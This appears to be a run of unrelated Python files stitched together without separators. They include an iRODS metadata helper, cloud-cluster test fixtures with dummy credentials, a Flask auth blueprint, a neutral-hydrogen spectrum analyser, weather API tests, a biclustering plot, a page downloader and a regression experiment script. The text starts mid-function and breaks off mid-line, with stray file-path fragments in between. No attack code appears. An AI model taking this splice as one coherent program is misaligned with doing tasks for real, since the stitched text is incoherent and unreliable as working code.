getMDall(self, key): ''' Fetches all metadata with with a certain key from all members in a collection. It assumes that the key is only present once. Returns a dictionary iRODS path --> value ''' metadata = {} if key in self.coll.metadata.keys(): metadata[self.coll.path] = self.coll.metadata.get_all(key)[0].value for obj in self.coll.data_objects: if key in obj.metadata.keys(): metadata[obj.path] = obj.metadata.get_all(key)[0].value return metadata 1-10 from typing import Dict, List from cli.src.helpers.ObjDict import ObjDict from cli.src.helpers.objdict_helpers import dict_to_objdict def CONFIG_DOC() -> ObjDict: return dict_to_objdict([ { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-0', 'specification': { 'ip': '172.16.58.3', 'hostname': 'service-vm-2' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-1', 'specification': { 'ip': '192.168.3.11', 'hostname': 'service-vm-4' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-2', 'specification': { 'ip': '192.168.3.11', 'hostname': 'service-vm-1' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-3', 'specification': { 'ip': '172.16.17.32', 'hostname': 'service-vm-0' }, 'version': '1.3.0dev' }, { 'kind': 'infrastructure/machine', 'title': 'Virtual Machine Infra', 'provider': 'any', 'name': 'service-4', 'specification': { 'ip': '172.16.31.10', 'hostname': 'service-vm-3' }, 'version': '1.3.0dev' }, ]) def CLUSTER_MODEL(provider: str) -> ObjDict: return dict_to_objdict({ 'kind': 'epiphany-cluster', 'title': 'Epiphany cluster Config', 'provider': f'{provider}', 'name': 'default', 'specification': { 'prefix': 'prefix', 'name': 'cluster', 'admin_user': { 'name': 'username', 'key_path': '/path/to/key' }, 'cloud': { 'k8s_as_cloud_service': False, 'subscription_name': 'Subscription Name', 'vnet_address_pool': '10.1.0.0/20', 'use_public_ips': True, 'use_service_principal': False, 'region': 'West Europe', 'network': {'use_network_security_groups': True}, 'default_os_image': 'default', 'hostname_domain_extension': '', 'credentials': { 'access_key_id': 'key', 'secret_access_key': 'secret', 'session_token': 'token' } }, 'components': { 'service': { 'count': 5, 'machine': 'service-machine', 'configuration': 'default', 'subnets': [{'address_pool': '10.1.8.0/24'}], 'machines': ['service-0', 'service-1', 'service-2', 'service-3', 'service-4'] } } }, 'version': '1.3.0dev' }) RUNNING_INSTANCES_AZURE: List[List[Dict]] = [ [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-0', 'network': { 'privateIpAddresses': ['10.1.8.6'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-0', 'ipAddress': '172.16.17.32', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-0', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-2', 'network': { 'privateIpAddresses': ['10.1.8.5'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '172.16.58.3', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-2', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-1', 'network': { 'privateIpAddresses': ['10.1.8.4'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '192.168.3.11', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-1', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-4', 'network': { 'privateIpAddresses': ['10.1.8.3'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '192.168.3.11', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-4', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ], [ {'virtualMachine': { 'name': 'prefix-cluster-service-vm-3', 'network': { 'privateIpAddresses': ['10.1.8.2'], 'publicIpAddresses': [ {'id': '/subscriptions/subscription_hash/resourceGroups/prefix-cluster-rg/providers/Microsoft.Network/publicIPAddresses/prefix-cluster-service-pubip-2', 'ipAddress': '172.16.31.10', 'ipAllocationMethod': 'Static', 'name': 'prefix-cluster-service-pubip-3', 'resourceGroup': 'prefix-cluster-rg', 'zone': '1'} ] }, 'resourceGroup': 'prefix-cluster-rg'} } ] ] class AWSMockInstance: def __init__(self, name, ip): self.tags = [] self.tags.append({ 'Key': 'Name', 'Value': name, }) self.private_ip_address = ip self.public_ip_address = ip RUNNING_INSTANCES_AWS: List[Dict] = [ AWSMockInstance('prefix-cluster-service-vm-4', '192.168.3.11'), AWSMockInstance('prefix-cluster-service-vm-1', '192.168.3.11'), AWSMockInstance('prefix-cluster-service-vm-3', '172.16.31.10'), AWSMockInstance('prefix-cluster-service-vm-0', '172.16.17.32'), AWSMockInstance('prefix-cluster-service-vm-2', '172.16.58.3') ] # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from google.appengine.ext import ndb class FrontendJob(ndb.Model): """Class representing a frontend job. A frontend job is a Clovis task sent by the user, and associated metadata (such as the username, the start time...). It is persisted in the Google Cloud datastore. All frontend jobs are ancestors of a single entity called 'FrontendJobList'. This allows to benefit from strong consistency when querying the job associated to a tag. """ # Base URL path to get information about a job. SHOW_JOB_URL = '/show_job' # ndb properties persisted in the datastore. Indexing is not needed. email = ndb.StringProperty(indexed=False) status = ndb.StringProperty(indexed=False) task_url = ndb.StringProperty(indexed=False) eta = ndb.DateTimeProperty(indexed=False) start_time = ndb.DateTimeProperty(auto_now_add=True, indexed=False) # Not indexed by default. clovis_task = ndb.TextProperty(compressed=True, indexed=False) log = ndb.TextProperty(indexed=False) @classmethod def _GetParentKeyFromTag(cls, tag): """Gets the key that can be used to retrieve a frontend job from the job list. """ return ndb.Key('FrontendJobList', tag) @classmethod def CreateForTag(cls, tag): """Creates a frontend job associated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) return cls(parent=parent_key) @classmethod def GetFromTag(cls, tag): """Gets the frontend job associated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) return cls.query(ancestor=parent_key).get() @classmethod def DeleteForTag(cls, tag): """Deletes the frontend job assowiated with tag.""" parent_key = cls._GetParentKeyFromTag(tag) frontend_job = cls.query(ancestor=parent_key).get(keys_only=True) if frontend_job: frontend_job.delete() @classmethod def ListJobs(cls): """Lists all the frontend jobs. Returns: list of strings: The list of tags corresponding to existing frontend jobs. """ return [key.parent().string_id() for key in cls.query().fetch( 100, keys_only=True)] @classmethod def GetJobURL(cls, tag): """Gets the URL that can be used to get information about a specific job.""" return cls.SHOW_JOB_URL + '?tag=' + tag def RenderAsHtml(self): """Render a short job description as a HTML table. The log and ClovisTask are not included, because they are potentially very large. """ html = '' for p in FrontendJob._properties: if p == 'log' or p == 'clovis_task': continue value = getattr(self, p) if value: html += '' html += '
    ' + p + '' + str(value) + '
    ' return html from flask import Blueprint, request from .AuthController import find_user, check_user, signup, check_token, get_home auth = Blueprint('auth', __name__, template_folder='auth_templates', url_prefix='/auth') @auth.route('/', methods=["POST"]) def validate(path): if path in ['username', 'email']: return find_user(path, request.form[path]) elif path == 'login': return check_user(request.form) elif path == 'signup': return signup(request.form) @auth.route('/confirm_email/') def confirm_email(token): return check_token(token) @auth.route('/', methods=["GET"]) def home(path): if path == 'home': return get_home() from dash import dcc from dash.development.base_component import Component from flask_login import logout_user from back_office.helpers.login import get_current_user from back_office.routing import Page def _layout() -> Component: if get_current_user().is_authenticated: logout_user() return dcc.Location(pathname='/', id='back_home') PAGE = Page(_layout, None, False) MilkyWay.py # -*- coding: utf-8 -*- """ Created on Mon Jan 17 09:19:39 2022 @author: BI6MHT """ from astropy.coordinates import SkyCoord,Angle,EarthLocation from astropy.time import Time from astropy.constants import c,k_B import astropy.units as u import numpy as np import matplotlib.pyplot as plt # 对曲线进行平滑 #import statsmodels.api as sm #lowess = sm.nonparametric.lowess # 寻求极大值;对曲线进行平滑 from scipy import signal # 单个天体的获取 class MilkyWay(): """ 初始化类的属性 obs_Dir:观测文件所在根目录 obs_Site:观测者在地球上所在位置,例如 obs_Source:观测源的赤经赤纬,例如'12h10m0s 20d' obs_Time:观测的UTC时间,例如'2021-10-30 13:00:43' smooth_Window(默认值31): 即Savitzky-Golay滤波器的窗口长度,值越小,曲线越贴近真实曲线;值越大,平滑效果越厉害(备注:该值必须为正奇整数) smooth_k(默认值3): 值越大,曲线越贴近真实曲线;值越小,曲线平滑越厉害。另外,当k值较大时,受窗口长度限制,拟合会出现问题,高频曲线会变成直线。 """ def __init__(self,obs_Dir,obs_Site,obs_Source,obs_Time,smooth_Window=21,smooth_k=3): self.obs_Freq = 1420.4057517667 self.obs_Dir = obs_Dir self.obs_Site = obs_Site self.obs_Source = obs_Source self.obs_Time = obs_Time self.smooth_Window = smooth_Window self.smooth_k = smooth_k self.obs_GalLon,self.obs_GalLat = self.get_GalCoord() # 获取频谱参数,第一列为频率(MHz);第二列是强度,默认单位为W self.spec = np.loadtxt(self.obs_Dir+self.obs_Source+'.txt',dtype=float,skiprows=1) # 取-150到150km/s之间的径向速度rv,以及对应的等效温度(平滑和未平滑) self.rv, self.equiTemp_Smooth,self.equiTemp = self.get_Smooth() # 得到峰值点以最大径向速度那一点 # 按峰值降序排列 # 最大速度那一点对应末端元素 self.rv_Array,self.T_Array = self.get_Peaks() """ 获取源所在的银经和银维 返回类型:list类型 返回结果:银经 银维 返回例子:'54.2663 0.224174' """ def get_GalCoord(self): Source = SkyCoord(self.obs_Source,frame='icrs') Gal = Source.galactic.to_string() Gal_lon = float(Gal.split(' ')[0]) Gal_lat = float(Gal.split(' ')[1]) return Gal_lon,Gal_lat """ 根据多普勒效应,获取不同频率对应的修正到日心的径向速度 返回类型:一维的numpy.ndarray 返回结果:不同频率对应的径向速度 返回例子:[1098.31559636 ... -1005.95448058 -1008.01546988] """ def get_CorrectVel(self): obs_Time = Time(self.obs_Time) obs_SiteLon = Angle(self.obs_Site.split(' ')[0],unit=u.deg) obs_SiteLat = Angle(self.obs_Site.split(' ')[1],unit=u.deg) obs_SiteHei = float(self.obs_Site.split(' ')[2])*u.m loc = EarthLocation.from_geodetic(obs_SiteLon,obs_SiteLat,obs_SiteHei) # 观测天体源所在的赤经赤纬,坐标框架采用icrs,即天球坐标系坐标 Source = SkyCoord(self.obs_Source,frame='icrs') # 读取频谱文件,获取观测频点 spec_freq = self.spec[:,0] # 地球上观测者和中性氢在视线上的相对速度,即径向速度 # 根据多普勒效应,不同频点对应的不同径向速度 rv = (self.obs_Freq-spec_freq)*c/self.obs_Freq # 径向速度vr是观测者和中性氢在视线上的相对速度 # 现在我们要求得以太阳系质心为原点时(或者大概认为是在太阳中心观测),太阳中心和中性氢在两者连线上的相对速度 # 即进行坐标转换,因而要求出一个速度修正项 vcorr = Source.radial_velocity_correction(kind='barycentric',obstime=obs_Time, location=loc) # 加上速度修正项以后,便得到了在太阳上观测中性氢的径向速度 # m/s转成km/s,然后取其数值 rv = (rv + vcorr + rv*vcorr/c) rv = rv.to(u.km/u.s).to_value() # 显然,频率较大(蓝移)时,rv为负;频率较小(红移)时,rv为正 # 所以目前rv是的排序是由正到负的,不妨让rv逆序排列 rv = rv[::-1] return rv """ 获取频率强度(电平)对应的等效温度 返回类型:一维的numpy.ndarray 返回结果:不同径向速度(频率)对应的等效温度 返回例子:[1.31519478 1.26451874 ... 1.40664323 1.37319388 1.22032352] """ def get_EquiTemp(self): spec_freq = self.spec[:,0] spec_level = self.spec[:,1] # 观测带宽,由于MHz,故乘以10^6 spec_width = (spec_freq[-1]-spec_freq[0])*np.power(10,6) # 根据奈奎斯特噪声或者说热噪声,有P=kBT,其中P为功率,k为玻尔兹曼常数,B为带宽,T为温度 # 即我们可以将功率等效为温度 # 由于等效出来的数量级过大,故可乘以10^(-27)以减小数量级 equiTemp = (spec_level/k_B/spec_width)*pow(10,-14) # 由于径向速度rv是逆序排列的,故另EquiTemp也逆向排序,以和rv一一对应 equiTemp = equiTemp[::-1] # 由于等式中出现从astropy中调用的k_B常量,故equiTemp是 # 取其数值 equiTemp = equiTemp.to_value() return equiTemp """ 获取-150到150km/s之间的径向速度rv以及对应的等效温度T,并进行平滑处理 返回类型:一维的numpy.ndarray,一维的numpy.ndarray 返回结果:径向速度,等效温度 返回例子:[-148.58293111 ... 146.13853902],[1.31519478 ... 1.22032352] """ def get_VT(self): rv = self.get_CorrectVel() equiTemp = self.get_EquiTemp() rv_index=np.where((rv>-150)&(rv<150))[0] rv_start = rv_index[0] rv_end = rv_index[-1] rv_150 = rv[rv_start:rv_end] equiTemp_150 = equiTemp[rv_start:rv_end] return rv_150,equiTemp_150 # def get_Smooth(self): # rv, equiTemp = self.get_VT() # # 对数值进行平滑化 # # 其中的1/20代表平滑程度,可自行调整 # T_Smooth = lowess(equiTemp,rv,frac=self.Smooth)[:,1] # return rv,T_Smooth,equiTemp """ 对 径向速度rv vs 等效温度equiTemp 的曲线进行平滑处理 其中vr在-150km/s到150km/s之间 返回类型:一维的numpy.ndarray,一维的numpy.ndarray,一维的numpy.ndarray 返回结果:径向速度,平滑等效温度,未平滑等效温度 返回例子:[-148.58293111 ... 146.13853902],[1.31519478 ... 1.22032352],[1.31519478 ... 1.22032352] """ def get_Smooth(self): rv, equiTemp = self.get_VT() # 对数值进行平滑 T_Smooth = signal.savgol_filter(equiTemp,self.smooth_Window,self.smooth_k) return rv,T_Smooth,equiTemp """ 获取频谱图 """ def get_Plot(self): plt.figure() #设置使用的字体为支持中文的字体 plt.rcParams['font.sans-serif']=['SimHei']; plt.rcParams['axes.unicode_minus'] = False; # 未平滑 plt.subplot(2,1,1) plt.plot(self.rv,self.equiTemp) plt.title(self.obs_Source + ' ' + self.obs_Time) # 平滑 plt.subplot(2,1,2) plt.plot(self.rv,self.equiTemp_Smooth); plt.xlabel('中性氢分子团相对于日心的径向速度vr(km/s)') plt.ylabel('等效温度T(K)') # 画出峰值,以及最大径向速度那一点 for i in range(0,len(self.T_Array)): plt.scatter(self.rv_Array[i],self.T_Array[i],s=25,c='r') plt.text(self.rv_Array[i],self.T_Array[i],\ str(np.around(self.rv_Array[i],3))+','+str(np.around(self.T_Array[i],3)),\ fontdict={'fontsize':8}); # 以银经命名,银经保留一位小数 plt.savefig('Images/'+str(np.around(self.obs_GalLon,1))+'.png') plt.clf() # 清图 plt.cla() # 清坐标轴 plt.close() # 关窗口 """ 寻求最大峰以及右边的峰,即求极值问题 返回类型:一维的numpy.ndarray,一维的numpy.ndarray 返回结果:峰的径向速度以及最大径向速度,对应的等效温度 返回例子:[-148.58293111 ... 146.13853902],[1.31519478 ... 1.22032352] """ def get_Peaks(self): # 观察频谱规律后,对于银经0到90°,270°到360°,寻峰算法如下 # 求取最高峰所在位置 max_Index = np.argmax(self.equiTemp_Smooth) # 峰值间的最小间隔点数,两峰之间的间隔需大于此 # 此处设两峰之间的间隔需大于30km/s lim_Distance = np.ceil((30*len(self.equiTemp_Smooth)/300)) # 寻峰,即求极值点 # 此处只求最大峰及其左边的峰 peaks =signal.find_peaks(self.equiTemp_Smooth[0:max_Index+2],distance = lim_Distance)[0] # 找出极大值对应的径向速度和等效温度 T_Array = np.array([]) rv_Array = np.array([]) for peak in peaks: T_Array= np.append(T_Array,self.equiTemp_Smooth[peak]) rv_Array = np.append(rv_Array,self.rv[peak]) # 按峰值降序排序,得到索引 Order = T_Array.argsort()[::-1] # 利用索引对径向速度和等效温度进行排序 rv_Array = rv_Array[Order] T_Array = T_Array[Order] # 在尾端加入最大径向速度 mark_Vel,mark_T = self.get_MaxVel() rv_Array = np.append(rv_Array,mark_Vel) T_Array = np.append(T_Array,mark_T) return rv_Array,T_Array """ 获取氢谱线峰的最大径向速度,以及对应的等效温度 峰是弥散开来,可以求右边最高峰衰减到一定值处对应的速度 返回类型: float 返回结果:最大径向速度,等效温度 """ def get_MaxVel(self): # 此处以(右边最高峰)衰减到(右边最高峰)的右边频谱积分平值为截止标准 max_Index = np.argmax(self.equiTemp_Smooth) mark_Index = self.get_RightFirst(self.equiTemp_Smooth,max_Index) mark_Vel = self.rv[mark_Index] mark_T = self.equiTemp_Smooth[mark_Index] return mark_Vel,mark_T """ 返回第一个小于右边频谱积分平值的索引 返回类型: int 返回结果:索引 """ def get_RightFirst(self,Arr,Index): # 边缘峰的右边频谱的积分平均值 # 不能用[Index:-1],可以实际测试一下 spec_Ave = np.sum(Arr[Index:len(Arr)])/len(Arr[Index:len(Arr)]) # 寻求第一个小于spec_Ave对应的索引 for i in range(Index,len(Arr)): i+1 if Arr[i] <= spec_Ave: break return i #!/usr/bin/env python import os import time import unittest import json import responses import herepy class DestinationWeatherApiTest(unittest.TestCase): def setUp(self): api = herepy.DestinationWeatherApi('app_id', 'app_code') self._api = api def test_initiation(self): self.assertIsInstance(self._api, herepy.DestinationWeatherApi) self.assertEqual(self._api._app_id, 'app_id') self.assertEqual(self._api._app_code, 'app_code') self.assertEqual(self._api._base_url, 'https://weather.api.here.com/weather/1.0/report.json') @responses.activate def test_forecast_astronomy_whensucceed(self): with open('testdata/models/destination_weather.json', 'r') as f: expectedResponse = f.read() responses.add(responses.GET, 'https://weather.api.here.com/weather/1.0/report.json', expectedResponse, status=200) response = self._api.forecast_astronomy('London') self.assertTrue(response) self.assertIsInstance(response, herepy.DestinationWeatherResponse) @responses.activate def test_forecast_astronomy_whenerroroccured(self): with open('testdata/models/destination_weather_error.json', 'r') as f: expectedResponse = f.read() responses.add(responses.GET, 'https://weather.api.here.com/weather/1.0/report.json', expectedResponse, status=200) with self.assertRaises(herepy.HEREError): self._api.forecast_astronomy('London') zhangjx1996/STA-663-Final-Project from SSVD import ssvd_opt import matplotlib.pyplot as plt import seaborn as sns import numpy as np def biclusterplot(u,s,v,ax,title = "title"): u = np.sort(u)/np.max(np.abs(u)) v = np.sort(v)/np.max(np.abs(v)) X = s*np.outer(u,v) sns.heatmap(X, cmap ="RdBu",vmin = -1,vmax = 1, ax = ax).set_title(title) u_til = np.r_[np.arange(3,11)[::-1], 2*np.ones(17), np.zeros(75)].reshape(-1,1) u_til = u_til/np.linalg.norm(u_til) v_til = np.r_[np.array([10,-10,8,-8,5,-5]),3*np.ones(5),-3*np.ones(5),np.zeros(34)].reshape(-1,1) v_til = v_til/np.linalg.norm(v_til) s = 50 X_sim = s*u_til@v_til.T n,p = X_sim.shape X_sim = X_sim + np.random.randn(n,p) fig, axes = plt.subplots(1,2,figsize=(15,5)) u1, s1, v1, iters = ssvd_opt(X_sim) sns.heatmap(X_sim, cmap ="RdBu",vmin = -1,vmax = 1,ax=axes[0]).set_title("Original Simulated data") biclusterplot(u1,s1,v1,ax = axes[1],title = "bicluster by ssvd") backup/www/scrapy/chapter02/common.py import urllib.request as urllib2 def download(url, user_agent=None): print('Downloading:%s' % url) headers = {'User-agent': user_agent or 'wswp'} request = urllib2.Request(url, headers=headers) try: html = urllib2.urlopen(request).read().decode('utf-8') except urllib2.URLError as e: print('Download error:%s' % e.reason) html = None return html if __name__ == '__main__': print(download('http://example.webscraping.com')) import os import sys import copy import torch import pickle import argparse import warnings import numpy as np import pandas as pd import sklearn as skl import tensorflow as tf from regression_data import generate_toy_data from callbacks import RegressionCallback from regression_models import prior_params, NormalRegression, StudentRegression, VariationalPrecisionNormalRegression from utils_model import monte_carlo_student_t # import Detlefsen baseline model sys.path.append(os.path.join(os.getcwd(), 'john-master')) from toy_regression import detlefsen_toy_baseline from experiment_regression import detlefsen_uci_baseline # set results directory globally since its used all over this file RESULTS_DIR = 'results' class MeanVarianceLogger(object): def __init__(self, df_data=None, df_eval=None): self.cols_data = ['Algorithm', 'Prior', 'x', 'y'] self.df_data = pd.DataFrame(columns=['Algorithm', 'Prior', 'x', 'y']) if df_data is None else df_data self.cols_eval = ['Algorithm', 'Prior', 'x', 'mean(y|x)', 'std(y|x)'] self.df_eval = pd.DataFrame(columns=self.cols_eval) if df_eval is None else df_eval @staticmethod def __to_list(val): if isinstance(val, tf.Tensor): val = val.numpy() assert isinstance(val, np.ndarray) val = np.squeeze(val) return val.tolist() def update(self, algorithm, prior, x_train, y_train, x_eval, mean, std, trial): # update training points data frame algorithm_list = [algorithm] * len(x_train) prior_list = [prior] * len(x_train) x_train = self.__to_list(x_train) y_train = self.__to_list(y_train) df_new = pd.DataFrame(dict(zip(self.cols_data, (algorithm_list, prior_list, x_train, y_train))), index=[trial] * len(x_train)) self.df_data = self.df_data.append(df_new) # update evaluation data frame algorithm_list = [algorithm] * len(x_eval) prior_list = [prior] * len(x_eval) x_eval = self.__to_list(x_eval) mean = self.__to_list(mean) std = self.__to_list(std) df_new = pd.DataFrame(dict(zip(self.cols_eval, (algorithm_list, prior_list, x_eval, mean, std))), index=[trial] * len(x_eval)) self.df_eval = self.df_eval.append(df_new) def compute_metrics(y_eval, y_mean, y_std, y_new): y_eval = tf.cast(y_eval, tf.float64) y_mean = tf.cast(y_mean, tf.float64) y_std = tf.cast(y_std, tf.float64) y_new = tf.cast(y_new, tf.float64) mean_residuals = y_mean - y_eval var_residuals = y_std ** 2 - mean_residuals ** 2 sample_residuals = y_new - y_eval metrics = { 'Mean Bias': tf.reduce_mean(mean_residuals).numpy(), 'Mean RMSE': tf.sqrt(tf.reduce_mean(mean_residuals ** 2)).numpy(), 'Var Bias': tf.reduce_mean(var_residuals).numpy(), 'Var RMSE': tf.sqrt(tf.reduce_mean(var_residuals ** 2)).numpy(), 'Sample Bias': tf.reduce_mean(sample_residuals).numpy(), 'Sample RMSE': tf.sqrt(tf.reduce_mean(sample_residuals ** 2)).numpy() } return metrics def train_and_eval(dataset, algo, prior, epochs, batch_size, x_train, y_train, x_eval, y_eval, parallel, **kwargs): # toy data configuration if dataset == 'toy': # hyper-parameters d_hidden = 50 f_hidden = 'sigmoid' learning_rate = 5e-3 num_mc_samples = 50 early_stopping = False # prior parameters k = 20 u = np.expand_dims(np.linspace(np.min(x_eval), np.max(x_eval), k), axis=-1) a, b = prior_params(kwargs.get('precisions'), prior_fam='Gamma') # UCI data configuration else: # hyper-parameters d_hidden = 100 if dataset in {'protein', 'year'} else 50 f_hidden = 'elu' learning_rate = 1e-3 num_mc_samples = 20 early_stopping = True # prior parameters if kwargs.get('k') is None: k = None u = None else: k = kwargs.get('k') u = x_train[np.random.choice(x_train.shape[0], min(x_train.shape[0], k), replace=False)] a = kwargs.get('a') b = kwargs.get('b') # create TF data loaders ds_train = tf.data.Dataset.from_tensor_slices({'x': x_train, 'y': y_train}) ds_train = ds_train.shuffle(10000, reshuffle_each_iteration=True).batch(batch_size) ds_eval = tf.data.Dataset.from_tensor_slices({'x': x_eval, 'y': y_eval}) ds_eval = ds_eval.shuffle(10000, reshuffle_each_iteration=True).batch(batch_size) # pick appropriate model and gradient clip value if algo == 'Normal': model = NormalRegression elif algo == 'Student': model = StudentRegression else: model = VariationalPrecisionNormalRegression # declare model instance mdl = model(d_in=x_train.shape[1], d_hidden=d_hidden, f_hidden=f_hidden, d_out=y_train.shape[1], y_mean=0.0 if dataset == 'toy' else np.mean(y_train, axis=0), y_var=1.0 if dataset == 'toy' else np.var(y_train, axis=0), prior_type=prior, prior_fam='Gamma', num_mc_samples=num_mc_samples, a=a, b=b, k=k, u=u) # relevant metric names model_ll = 'val_Model LL' mean_mse = 'val_Mean MSE' # train the model callbacks = [RegressionCallback(epochs, parallel)] if early_stopping: callbacks += [tf.keras.callbacks.EarlyStopping(monitor=model_ll, min_delta=1e-4, patience=50, mode='max', restore_best_weights=True)] mdl.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), loss=[None]) hist = mdl.fit(ds_train, validation_data=ds_eval, epochs=epochs, verbose=0, callbacks=callbacks) # test for NaN's nan_detected = bool(np.sum(np.isnan(hist.history['loss']))) # get index of best validation log likelihood i_best = np.nanargmax(hist.history[model_ll]) if np.nanargmax(hist.history[model_ll]) >= 0.9 * epochs: warnings.warn('Model not converged!') # retrieve performance metrics ll = hist.history[model_ll][i_best] mean_rmse = np.sqrt(hist.history[mean_mse][i_best]) # evaluate predictive model with increased Monte-Carlo samples (if sampling is used by the particular model) mdl.num_mc_samples = 2000 y_mean, y_std, y_new = mdl.predictive_moments_and_samples(x_eval) metrics = {'LL': ll, 'Mean RMSL2': mean_rmse} metrics.update(compute_metrics(y_eval, y_mean, y_std, y_new)) return mdl, metrics, y_mean, y_std, nan_detected def run_experiments(algo, dataset, mode='resume', parallel=False, **kwargs): assert algo in {'Detlefsen', 'Detlefsen (fixed)', 'Normal', 'Student', 'Gamma-Normal'} assert not (algo == 'Detlefsen (fixed)' and dataset != 'toy') assert mode in {'replace', 'resume'} # parse algorithm/prior names if algo == 'Gamma-Normal': prior_fam = 'Gamma' prior_type = kwargs.pop('prior_type') base_name = algo + '_' + prior_type else: prior_fam = '' prior_type = 'N/A' base_name = algo # dataset specific hyper-parameters n_trials = 10 if dataset in {'toy', 'protein', 'year'} else 20 batch_size = 500 if dataset == 'toy' else 256 if dataset == 'toy': batch_iterations = int(6e3) elif dataset in {'carbon', 'naval', 'power plant', 'superconductivity'}: batch_iterations = int(1e5) else: batch_iterations = int(2e4) # establish experiment directory experiment_dir = 'regression_toy' if dataset == 'toy' else 'regression_uci' os.makedirs(os.path.join(RESULTS_DIR, experiment_dir), exist_ok=True) # parse prior type hyper-parameters if prior_type == 'Standard' and dataset != 'toy': # if prior parameters not provided, use best discovered parameter set from VBEM if kwargs.get('a') is None or kwargs.get('b') is None: relevant_prior_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, algo + '_VBEM_prior.pkl') assert os.path.exists(relevant_prior_file) prior_params = pd.read_pickle(relevant_prior_file) a, b = np.squeeze(pd.DataFrame(prior_params.groupby(['a', 'b'])['wins'].sum().idxmax()).to_numpy()) kwargs.update({'a': a, 'b': b}) base_name += ('_' + str(kwargs.get('a')) + '_' + str(kwargs.get('b'))) hyper_params = 'a={:f},b={:f}'.format(kwargs.get('a'), kwargs.get('b')) elif 'VAMP' in prior_type or prior_type == 'VBEM*': base_name += ('_' + str(kwargs.get('k'))) hyper_params = 'k={:d}'.format(kwargs.get('k')) else: hyper_params = 'None' base_name = base_name.replace(' ', '').replace('*', 't') # make sure results subdirectory exists os.makedirs(os.path.join(RESULTS_DIR, experiment_dir, dataset), exist_ok=True) # create full file names logger_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '.pkl') nan_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_nan_log.txt') data_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_data.pkl') mv_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_mv.pkl') prior_file = os.path.join(RESULTS_DIR, experiment_dir, dataset, base_name + '_prior.pkl') # load results if we are resuming if mode == 'resume' and os.path.exists(logger_file): logger = pd.read_pickle(logger_file) if dataset == 'toy': mv_logger = MeanVarianceLogger(df_data=pd.read_pickle(data_file), df_eval=pd.read_pickle(mv_file)) if prior_type == 'VBEM': vbem_logger = pd.read_pickle(prior_file) t_start = max(logger.index) print('Resuming', dataset, algo, prior_type, 'at trial {:d}'.format(t_start + 2)) # otherwise, initialize the loggers else: logger = pd.DataFrame(columns=['Algorithm', 'Prior', 'Hyper-Parameters', 'LL', 'Mean RMSL2', 'Mean Bias', 'Mean RMSE', 'Var Bias', 'Var RMSE', 'Sample Bias', 'Sample RMSE']) if os.path.exists(nan_file): os.remove(nan_file) if dataset == 'toy': mv_logger = MeanVarianceLogger() if prior_type == 'VBEM': vbem_logger = pd.DataFrame(columns=['a', 'b', 'wins']) t_start = -1 # loop over the trials for t in range(t_start + 1, n_trials): if not parallel: print('\n*****', dataset, 'trial {:d}/{:d}:'.format(t + 1, n_trials), algo, prior_type, '*****') # set random number seeds seed = args.seed_init * (t + 1) np.random.seed(seed) tf.random.set_seed(seed) torch.manual_seed(seed) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False # toy data if dataset == 'toy': # generate data x_train, y_train, x_eval, y_eval, true_std = generate_toy_data() # compute true precisions kwargs.update({'precisions': 1 / true_std[(np.min(x_train) <= x_eval) * (x_eval <= np.max(x_train))] ** 2}) # uci data else: # load and split data with open(os.path.join('data', dataset, dataset + '.pkl'), 'rb') as f: data_dict = pickle.load(f) x, y = data_dict['data'], data_dict['target'] x_train, x_eval, y_train, y_eval = skl.model_selection.train_test_split(x, y, test_size=0.1) # scale features x_scale = skl.preprocessing.StandardScaler().fit(x_train) x_train = x_scale.transform(x_train) x_eval = x_scale.transform(x_eval) # compute epochs to correspond to the number of batch iterations (as used by Detlefsen) epochs = round(batch_iterations / int(np.ceil(x_train.shape[0] / batch_size))) # run appropriate algorithm nan_detected = False if algo == 'Detlefsen' and dataset == 'toy': ll, mean_rmse, mean, std = detlefsen_toy_baseline(x_train, y_train, x_eval, y_eval, bug_fix=False) metrics = {'LL': ll, 